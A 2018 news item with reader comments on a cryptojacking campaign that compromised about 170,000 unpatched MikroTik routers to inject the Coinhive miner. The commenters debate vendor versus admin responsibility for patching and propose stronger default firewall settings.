Thursday, August 2, 2018, 11:30 by Editors , 0 comments
Researchers have discovered tens of thousands of hacked routers from manufacturer MikroTik that inject a cryptominer on all websites visited by the owners. It may even involve 170,000 hacked routers, according to researcher Simon Kenin of security company Trustwave in a blogposting.
The MikroTik routers are hacked through a vulnerability patched by MikroTik on April 23 this year. Still, hundreds of thousands of vulnerable routers can still be found, according to Kenin. The vulnerability could allow remote attacker access to a vulnerable MikroTik router remotely. Then a script is executed that injects the Coinhive cryptominer on all websites that the owner visits.
Coinhive is a crypto machine that uses the computational power of the computer via the browser to minate to the cryptocurrency Monero. For this, the computer performs a cryptographic calculation. Figures from analysis platform Censys.io show that the cryptominer is active on more than 170,000 MikroTik routers. 70,000 of the routers would be in Brazil. Owners of the devices are advised to install the latest firmware update.
You mean the one the patched back in April 2018? Or the one that was patched in March 2017? What really is sad is the amount of Mikrotik users who have let their devices sit unwatched/maintained/updated for months and years on end.
There was a bug that allowed to find out passwords configured on the router. After that hacker can use them and log into router as a normal user. Then he can do whatever he wants. Upgrade will close this vulnerability, but if password is not changed, then hacker can still connect.
Hacker connects to the router and adds configuration - scripts, schedulers, enables SOCKS, etc. RouterOS filesystem is not affected. Only changes made by hacker are into RouterOS configuration.
What public steps? They fixed it in April!!! They are just now telling us “Hey, this is still happening. Make sure you updated.” This is just another repeat of VPNFilter when the patch was released a year ago but the malware made news in May (a year later) and people demanded to know what Mikrotik was doing RIGHT NOW about it despite the fact they addressed it a year ago.
I’m not arguing the point that there was a vulnerability that was pretty major but it was addressed months ago when it became public knowledge. Asking what they are doing today over something they addressed already just means no one is really paying attention to what Mikrotik is doing and putting out. They seem only care (freak out) when a random website blog tells them about it.
@msatter:
How do you expect that Mikrotik could MORE persuade people to upgrade if they (users not Mikrotik) do not care? It is not a matter how many infos Mikrotik will publish. If admin/user/owner do not care than it is not a problem of Mikrotik.
Do you think that other comapnies call or mail each customer to inform about their security problems?
Mikrotik did a good job in timely fixing and communicating the security issue with their customers.
It’s not their fault but many admins and device owners are just lazy or do not check the news.
@MT: Maybe a security announcement mailinglist like other vendors offer them could be beneficial for the future.
You understand how this works, right? Cisco isn’t going to get an alert from some security group/person on Monday that’s “Oh there’s a major exploit” and then announce it on Tuesday to their users. Why? Because they probably don’t have a fix for it yet and announcing it could make something that only a small group (Cisco and the reporters) may know exists just puts a target on all the possibly infected devices before they could push a fix for them. It might take Cisco weeks to disclose this exploit to their users so they can determine how serious it is, how to fix it and release said fix for the users so the announcement is “There’s an exploit, please update to X version for the fix along with X, Y, Z to ensure you’re not compromised”.
But let’s be honest here. This Winbox fix, when announced, had instructions of “Update THEN change passwords” but people were still like “I got hacked even though I did the update” and it turns out that they either updated the passwords then did the ROS update or just did the ROS update without touching their passwords. While they may stop FUTURE attacks, if they were already compromised they didn’t do the step to fix that problem or they did it in the wrong order.
I’m with BartoszP on this. While Mikrotik can take some of the blame for perhaps not “communicating fast enough” it really doesn’t matter how fast they communicate or how many methods they use to communicate when the users (you and I) ignore it and do NOTHING. Even worse, not ignore it but not follow the actual instructions properly. At some point the users have to step up and take responsibility for their laziness and/or not taking action.
RouterOS calls home each day or week to check if there is something wrong. If so every http session gets a page displayed that an update is needed because the router is below the minimal required version.
If ignored then after two weeks the router only functions when you are initiate an update. After the update all the functions are restored.
Mikrotik happy, user happy or not and the rest of the world is a bit saver again.
The main problem with Mikrotik/RouterOS in my opinion is the default “accept any”, whereas it should be “reject any except…” instead. Mikrotik might consider shipping future ROS devices with a stronger default firewall ruleset which locks down all services except Winbox/SSH from an Internal IP range on a single interface. Security should be by-default and not optional nowadays.
Unfortunately too many admins and device owners simply do not care enough, do not read the manual/wiki and just unpack and connect their new device happily to the internet. That’s where the problem begins.